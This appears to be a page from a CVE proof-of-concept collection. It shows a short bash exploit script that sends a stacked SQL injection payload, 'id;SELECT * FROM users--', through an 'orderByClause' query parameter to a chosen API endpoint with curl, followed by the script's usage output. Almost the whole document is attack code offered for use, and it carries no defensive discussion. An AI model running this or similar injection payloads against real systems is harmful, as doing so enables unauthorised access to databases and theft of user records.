4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / 20247456.sh SH
#!/bin/bash

if [ "$#" -lt 1 ]; then
    echo "Usage: $0 <target_url> [payload]"
    echo "Example: $0 http://<TARGET-HERE>/api/v1/external-users 'id;SELECT * FROM users--'"
    exit 1
fi

TARGET_URL=$1

# Set the payload from the second argument, or use a default if not provided
PAYLOAD=${2:-"id;SELECT * FROM users--"}

echo -e "\n[*] Attempting SQL Injection on $TARGET_URL with payload: $PAYLOAD"
curl -G "$TARGET_URL" --data-urlencode "orderByClause=$PAYLOAD" -v

echo -e "\n[+] SQL Injection payload sent."
Usage: -bash <target_url> [payload]
Example: -bash http://<TARGET-HERE>/api/v1/external-users 'id;SELECT * FROM users--'
logout